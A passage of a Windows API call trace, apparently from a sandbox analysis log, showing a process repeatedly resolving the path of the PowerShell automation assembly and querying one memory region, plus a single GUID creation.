lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.753] VirtualQuery (in: lpAddress=0xcb7d0, lpBuffer=0xcc690, dwLength=0x30 | out: lpBuffer=0xcc690*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.755] VirtualQuery (in: lpAddress=0xcb7d0, lpBuffer=0xcc690, dwLength=0x30 | out: lpBuffer=0xcc690*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.756] VirtualQuery (in: lpAddress=0xcb7d0, lpBuffer=0xcc690, dwLength=0x30 | out: lpBuffer=0xcc690*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.758] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.758] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.760] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.760] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.761] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.761] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.762] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.762] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.762] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.763] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.764] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.765] VirtualQuery (in: lpAddress=0xcb400, lpBuffer=0xcc2c0, dwLength=0x30 | out: lpBuffer=0xcc2c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.765] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.767] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.767] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.768] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.768] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x9a43a9b1, Data2=0xd3dd, Data3=0x4a3d, Data4=([0]=0xbd, [1]=0x1, [2]=0x55, [3]=0x98, [4]=0xf4, [5]=0xff, [6]=0x10, [7]=0x78))) returned 0x0 [0078.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.774] VirtualQuery (in: lpAddress=0xcb7d0, lpBuffer=0xcc690, dwLength=0x30 | out: lpBuffer=0xcc690*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.775] VirtualQuery (in: lpAddress=0xcb7d0, lpBuffer=0xcc690, dwLength=0x30 | out: lpBuffer=0xcc690*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.776] VirtualQuery (in: lpAddress=0xcb7d0, lpBuffer=0xcc690, dwLength=0x30 | out: lpBuffer=0xcc690*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.777] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.777] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.778] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.778] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.779] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.779] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.779] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.779] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.780] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.780] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.781] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, 